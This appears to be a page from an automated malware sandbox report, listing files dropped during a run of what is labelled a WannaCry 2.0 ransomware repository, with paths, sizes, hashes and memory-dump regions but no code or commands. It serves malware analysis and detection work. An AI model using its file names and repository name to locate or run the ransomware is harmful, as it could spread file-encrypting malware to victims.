27d66f2b9b52714f079295da5540fce00b03ecdd27fa9386dbd9fa43a3106221

SHA512
206bec5532011b3871782db2c917fa1f5931e661c34ca0872bad3b5635f51cfa75675b61f3d6530201748aefd42a177de20464005e91f556b2c7674a32743b3e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

Filesize
6KB

MD5
80ea913f0ea5b5366fb75c482b310e74

SHA1
633651f54076bb8699574a65323da3969bdac9df

SHA256
7ced13a228c3109d8ca8ef4f84e23802939d14566eacd05f1c0593f8e43e6cb5

SHA512
1834c7d78aab468b77f13bbce9d0abdadc98335d3dd99ed9507acb669124149f215ff874132c864a7de53cac4445649e4f23ba3f1157bc16ae04aaa93d0acaa6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

Filesize
6KB

MD5
34775a999d72cffb22acbd0b7d98aaa6

SHA1
e5e83a61091871f97f70f5dfb7891f036b8d34e5

SHA256
555efa41dce661287cf480f6f9ae611fd0c3b940cd9bdfc1225aa5ac957ffbf0

SHA512
b41c02e1eeb705a9cdd0dc7c13fe010795395f712c44120d7ea0db34e7e0442adf566551f22feaafb21d13d0c78a7204a00f8c85f74ccbb7aeda599ba6c6ce4e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

Filesize
6KB

MD5
59c7efb9be731093557a79f43096f4ef

SHA1
a88503c1679501ebf33ff3b09c690622566ed72d

SHA256
7433ede2934df0b7790fe4a027ea87b5555536474f00de665e3cba9c94cd1f2a

SHA512
0276a555928bf47408b045f28adf10fbfa80aecb4e2f41a4fca7ebe116ae5d2e19c7862298b6ca548e2de3c076ea0424e4b171f3150bfc4ecceafbde1148fa63

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\protections.sqlite

Filesize
64KB

MD5
49397db0486dc59d607907a086f40c9b

SHA1
08742ce9db9569062def08e99eea8470702feb7d

SHA256
890033ea279f13478e655150a823a5f84176d2f8f2ec3724dc61dfec775707c4

SHA512
fc8dad1ae2215cd96c41bb3e683670bb9138467677da46c19d1e58972775842a995b70123c22ea1efb659d043f5116d0c9dca422035a6646b35f81033c9f5f53

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json

Filesize
288B

MD5
362985746d24dbb2b166089f30cd1bb7

SHA1
6520fc33381879a120165ede6a0f8aadf9013d3b

SHA256
b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e

SHA512
0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

Filesize
53B

MD5
ea8b62857dfdbd3d0be7d7e4a954ec9a

SHA1
b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

SHA256
792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

SHA512
076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

Filesize
90B

MD5
c4ab2ee59ca41b6d6a6ea911f35bdc00

SHA1
5942cd6505fc8a9daba403b082067e1cdefdfbc4

SHA256
00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

SHA512
71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

Filesize
146B

MD5
65690c43c42921410ec8043e34f09079

SHA1
362add4dbd0c978ae222a354a4e8d35563da14b4

SHA256
7343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d

SHA512
c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

Filesize
122B

MD5
99601438ae1349b653fcd00278943f90

SHA1
8958d05e9362f6f0f3b616f7bfd0aeb5d37967c9

SHA256
72d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a

SHA512
ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

Filesize
259B

MD5
e6c20f53d6714067f2b49d0e9ba8030e

SHA1
f516dc1084cdd8302b3e7f7167b905e603b6f04f

SHA256
50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092

SHA512
462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
6d4114073fb273fa337a3a3b14b61dae

SHA1
f0f44d3af70d3c8c551d601074642e031d001e91

SHA256
b9e585217d7b7f8a1db3f509ab45ac7bc0981b9824259ae728e21e3af8c26b62

SHA512
35fc4c8ddb8fc5b1f5d862724051159d6d8746a50f9421d563f776c57f585356869c7277ee746a23365e046af476b720f8ff8464952886877bc59457d6467ca7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
6KB

MD5
a44bac652141a6dbfddb7b3a1fd7e89c

SHA1
bda3bb835391b0e1c197c8ab2ebe27df97e0cf8d

SHA256
4e532dd03c9c719436be85cdb8aa1653405f861c1e83c7b4556cd1cb2dff7d8b

SHA512
432d529401b4d192d241124a79fc1b57b5e7669fc895cbd00143334c61d233b8431adbe86a6a4f39c3b92b6098319efdca3d756f1e393b0d60e25d7106491542

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
96f35db267072549b2b076e73ec8ba21

SHA1
e1a122a862cd421cda6d92d771fd558691b7b28d

SHA256
2720a17738533021877ee3006cf61e879c060bcdcbd62c575b2c0aca0141fa60

SHA512
3629c2b2615ca0b3ec83409b91b20b1965cfcfe4a9cf92bbaa5878dbbee0ff28928a11fa9172979ad586b5ceb823bb422cd71d92eb20cbef7be6445789fb3369

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
5616d5350be686ddee3d57b2e3ac20cd

SHA1
b7355dbeb1756a11b15cd81e21a5c625cdad50ab

SHA256
c13b5f108ed0f2460206c76968b8b7c01b4712a56d9f3341c68a1e037228aa49

SHA512
854b45c434c9c1747f075b045498da1bd03f2494e506a52015c65cf8bcaa28e54d8a5df000bbfa7a86a51f62e84f9e6c2dd179c6b2c854806899f28745cd9263

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
8KB

MD5
08759a0a85eaac39b9a7f2bf57090fa8

SHA1
ba0d658af52d19aeb087f71a2520f8e21f99d9e1

SHA256
642fd7bff09048403f360beb88c68b3e831c50e72e0a857b9e7a3f607345416e

SHA512
71bcc4e46e77c65a58fb4d860ae703235bc42392fb3c5f332f2470bd5c74c639b5d1afdcb31ddc25e578acdd2eea2c47d9cc39db22879c747319ab16857a6bf4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
bc256cde673f64a47ec3da26429c74a8

SHA1
167d9f6503c6f08138e5996fc98b3400c5009a5c

SHA256
1656502a8d5785adac9e95f6110b1cae3691b987b260957974a5f314e62ef85b

SHA512
ee3ccf495a84f831f0d6d852b0c4cfe435edb353fff55e0128a56a4e083adf207d2372d7832cbbb71b58092dbf8188f6a1d99fc971bd4b8ca2d5d4d1904b6f1a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
4KB

MD5
4c13bb4bf31bec927d7b3e09d0926858

SHA1
8248f46d5fceb13c480f76c79d9ca41deea95e96

SHA256
bef2e0fc0738c82e7ca5563e88d5e666ebe10a7730287751efebef4d88a9df93

SHA512
f1cba3da37740ac4c1f9de58ee29bb2bf19b0ba54ac51553b2fc3fc001cc5163727a34df45e52535af7111f9b7d96d496eb862063ffd4a66c03d5aa7fdec6178

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
9KB

MD5
0c05beb316805ddf8a308efc4e080a51

SHA1
f4d4467d8b09e9d7a37228cb24e0ecde718184dd

SHA256
c832b8d343889538d94a62b6c2867d539cd63909e51009b6322ccab591c91aae

SHA512
fe766c7019c3b53469745ecc95aabdf0dfd5d734a27b713d9fcc9214bc72e329b3bd0d756a14068c550cb9d8fb20da6046a8609e143012c3cc82893a10d61245

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4

Filesize
2KB

MD5
7ee5a4ebd367e6ae57468edb9d309e53

SHA1
08fb2dc7d2a4981ced5284d4f60107b416060651

SHA256
ea352fcf99131dc7628a51906329899b0c683e71563ae034ff929ea191250c30

SHA512
8599cb2d7bbea75169713ac63ae472ab14cdb374aa926a6eb4093b7e23c6f856abfce7eb556e692309860c63fee57b78c1e77be41e3000699ae0e8c01ba3f461

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4

Filesize
9KB

MD5
8c49ac112830cea49fbc36e87f2e7a64

SHA1
5d765c172eceb3b72359cf43a875e7df0377f3f9

SHA256
c331d3888bb6263a9076a19d7e81d09e0408ead4ac082c363d6f0524176cfae8

SHA512
f74b89685ef12fc70b7e42106d69a001d39dd0b26ceda9cacf1e0c43651013be82451a3f072b70e1e7bc3a3e8b6012ce4e5137e4428a5aba54bb6df979a20741

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage.sqlite

Filesize
4KB

MD5
42a8ac62d6df0caa5db397589bbdceff

SHA1
29eaeba053a73d1f2d74ae76ede8e5d1293451ee

SHA256
543323ca552b9ddde17bb9c3c1f6d1bb2734543ad54df1ce1b48d2357a46806a

SHA512
49e778f718727f8dfd5fb2e263f7f7904bc53a9656258d8b08c8bb953e4423f5f55fca8b3831784757f707b1fc996be83bef4874d298327a2551dd438bad79d6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\.metadata-v2

Filesize
58B

MD5
31da86d61375faf4e9cdb83c82902e4e

SHA1
93a5ecbbc47674f82813bad01bd8a691c6c1f7ad

SHA256
2d3757475a13e0a2b734536d39ae1489e31a11bad905dbd59f6f08eeb873a5d3

SHA512
eeece39b47be016c40977247048377899dfc9d0bbad47b332036de4dcb4419b505cdf3a67a1e110f010c19c83967f7342c8a2e2316b17a9f9ff196af7edc0020

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\ls\data.sqlite

Filesize
10KB

MD5
d872d02766aa5fb12f723e087fe20d64

SHA1
9e1bcf9533a113826fdae092c39ce9b92b4caf34

SHA256
211f238c00f0120c3d2ecc27076ec2c9357fb402d8ec0ba306b91e5971caf057

SHA512
f9c5399572737b7911dcf0a3e167d41d3abee297d408110e0e89aa45999e579c7b6c58ada585ca72fa3a396cbb88da5b1e32ad07b1dcb468d0b4511e6248e44c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++github.com\ls\usage

Filesize
12B

MD5
c17e2755e3f942987fb5ac4ff4846331

SHA1
874087563e36d1176b1b10ca426ff10acebe7827

SHA256
809f108d5b50aed275f14f0b27cb8afadf73dc37841efb6c0e94eb28481ff263

SHA512
458cb9485f0ecbad42faecc809b9b919ba3003405f79fbf271c9da80fc7d800bb67e4c4e54f2719935a491bb3ac8f2392b342dd2ce171211545f3e5d6d32a4f7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++www.google.com\.metadata-v2

Filesize
62B

MD5
d53c4d4f0b260dde2b2d15c8dcca8d57

SHA1
78edb9c35231166155194f67b1072b0349d0c47c

SHA256
56d960ec7a89b4cf1b0b5db5b243d9f1dc31e5d6b516764cbe0311ac09ed5248

SHA512
dbca4331417a5e2ecba9a0aef370b62e95ee4a528da91b562716357d669c47f927e982eef4b82997674f2168d809428bd387e1f930267fb654942619f08061b2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++www.google.com\ls\usage

Filesize
12B

MD5
512e743bb545159cb1d486968b533343

SHA1
944d41d0af9101dd61980d912e01cfe847291251

SHA256
4b0b002f2882a7813f745491d12cc037ef7399d877b31505589ac0a2d623a555

SHA512
4c4c095daef76ddfaaf9ef92729508681d3073e38ef3c1cff1dcc944400e48da53fd863163af81df54ca5b945632f0a23ae8d297b44bc10442f36f28080faab9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite

Filesize
48KB

MD5
ef01614d25815d9f71a42d97af6f7f86

SHA1
2bc05e164d8da43f9e13e0014f1d39c664331eed

SHA256
3da0b21c4ff52c75078ec41706ee5cf070dd4c2ca54a017fabd6038318613613

SHA512
9b4f2ccd2885840acb325e2c25c118b83674e0143570ffe238b840a96dbb9a8a99d1d9bc10e9813fc02cef7098313b7bc0a7f0396616472c0a78f1db97b9572b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
184KB

MD5
0d0013d9708d9fef539adc917f5b87f6

SHA1
5e071e6b4d8abf007c8bb78ee948caf5bb0439e1

SHA256
f416d29cdbaa66b7d04483831d2a593a735316fafb643414a12df78da0ab054b

SHA512
851e9965a0fed9e0f5195ce655635cf13687d18678e4a9df807ab22cbc53c02cd2006fd65d93cd80b2a06d709e59122ea9933ba5cec551c6d51f5e9b4c175388

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json

Filesize
217B

MD5
58e240288763218d12bf235d34e5aee2

SHA1
89135494b57f590011c09668dec3b90d2c5ee9ae

SHA256
615f80e71dfde24711e7fefc1b7959f7592c5e5cf9ad0f3aecb4235b93187176

SHA512
caed2638902987aead199e73cffb90881bf245bbb616cb38c46b281d4aaaa54dc20a54e9bfe17a8d6e68847394c113fb7606e94b64f44ab0b52bf7846f26e936

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json.tmp

Filesize
141B

MD5
1995825c748914809df775643764920f

SHA1
55c55d77bb712d2d831996344f0a1b3e0b7ff98a

SHA256
87835b1bd7d0934f997ef51c977349809551d47e32c3c9224899359ae0fce776

SHA512
c311970610d836550a07feb47bd0774fd728130d0660cbada2d2d68f2fcfbe84e85404d7f5b8ab0f71a6c947561dcffa95df2782a712f4dcb7230ea8ba01c34c

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
10.8MB

MD5
6700e499687c2d4d29fd12ed96c5fc3e

SHA1
0da3429fd52193afe9b33199d1e0d67ba2233489

SHA256
067511028460a92c0fb2631ce3d838fa499cd32c525e1777e0f0c2fbab87e492

SHA512
06ca2464916553067ba5579f19a5d03b0e8c39cfacfcca3697b0d36ba8e5433296b87188572beb09ccdc09f2a38d2facec2a34e74c33542cdb3c42d649d1fc0a

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\@[email protected]

Filesize
1KB

MD5
f7c8b8b4247369e249daaea1ff17cce5

SHA1
8b255c168725fff9d518d1c393ae3508b57ff675

SHA256
716f0afbfe75c8976529d7dbc490e5f8fd0f9b7be9f13e188142d5617f3fdf84

SHA512
07387f82ea88167b90435dc134a68cdc3cf517fdfb8482f1ddf36bd34f29d60539c7a2c36d3fc297bd83f29399750be7f497cff89edc8c60ec6730dd9140ac70

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.UDZVBJBP.0-master.zip.part

Filesize
3.3MB

MD5
017f199a7a5f1e090e10bbd3e9c885ca

SHA1
4e545b77d1be2445b2f0163ab2d6f2f01ec4ca05

SHA256
761e037ee186880d5f7d1f112b839818056f160a9ba60c7fb8d23d926ac0621f

SHA512
76215a26588204247027dcfdab4ea583443b2b2873ff92ad7dd5e9a9037c77d20ab4e471b8dd83e642d8481f53dbc0f83f993548dc7d151dead48dc29c1fdc22

Download Submit
C:\Users\Admin\Downloads\You-Are-An-Idiot-main.j4SoN6dR.zip.part

Filesize
4.6MB

MD5
7cae6b379184f1cc5444ca2fc9a8ec75

SHA1
9a68fb4fed6c6f633275480ac481b7d24a1e60ad

SHA256
4b6edb96987da0a7714e705a7af8516ee7167c8a616eff6eb3ed9e54f6d02ee1

SHA512
fc81537d3fa0aa4fdc56ebcbc13bc43167cf1cd5424077c65292d7c86dd1e7aa11c44a5c78d8ca6fb31d942c034c1a9ee309aa8ee8a75a39dea0d3ed65790604

Download Submit
C:\Users\Default\Desktop\@[email protected]

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
memory/1292-1224-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/1972-2637-0x0000000004B10000-0x0000000004B1A000-memory.dmp

Filesize
40KB

Download
memory/1972-2628-0x0000000004FB0000-0x00000000054AE000-memory.dmp

Filesize
5.0MB

Download
memory/1972-2629-0x0000000004B50000-0x0000000004BE2000-memory.dmp

Filesize
584KB

Download
memory/1972-2627-0x0000000000160000-0x000000000016E000-memory.dmp

Filesize
56KB

Download
memory/5096-2588-0x0000000072910000-0x0000000072992000-memory.dmp

Filesize
520KB

Download
memory/5096-2599-0x0000000072910000-0x0000000072992000-memory.dmp

Filesize
520KB

Download
memory/5096-2598-0x00000000729A0000-0x0000000072BBC000-memory.dmp

Filesize
2.1MB

Download
memory/5096-2597-0x0000000072BC0000-0x0000000072BE2000-memory.dmp

Filesize
136KB

Download
memory/5096-2596-0x0000000072BF0000-0x0000000072C67000-memory.dmp

Filesize
476KB

Download
memory/5096-2595-0x0000000072C70000-0x0000000072C8C000-memory.dmp

Filesize
112KB

Download
memory/5096-2593-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2603-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2619-0x00000000729A0000-0x0000000072BBC000-memory.dmp

Filesize
2.1MB

Download
memory/5096-2614-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2594-0x0000000072C90000-0x0000000072D12000-memory.dmp

Filesize
520KB

Download
memory/5096-2590-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2587-0x00000000729A0000-0x0000000072BBC000-memory.dmp

Filesize
2.1MB

Download
memory/5096-2589-0x0000000072BC0000-0x0000000072BE2000-memory.dmp

Filesize
136KB

Download
memory/5096-2586-0x0000000072C90000-0x0000000072D12000-memory.dmp

Filesize
520KB

Download
memory/5096-2650-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2655-0x00000000729A0000-0x0000000072BBC000-memory.dmp

Filesize
2.1MB

Download
memory/5096-2657-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2707-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2719-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download
memory/5096-2728-0x0000000001060000-0x000000000135E000-memory.dmp

Filesize
3.0MB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads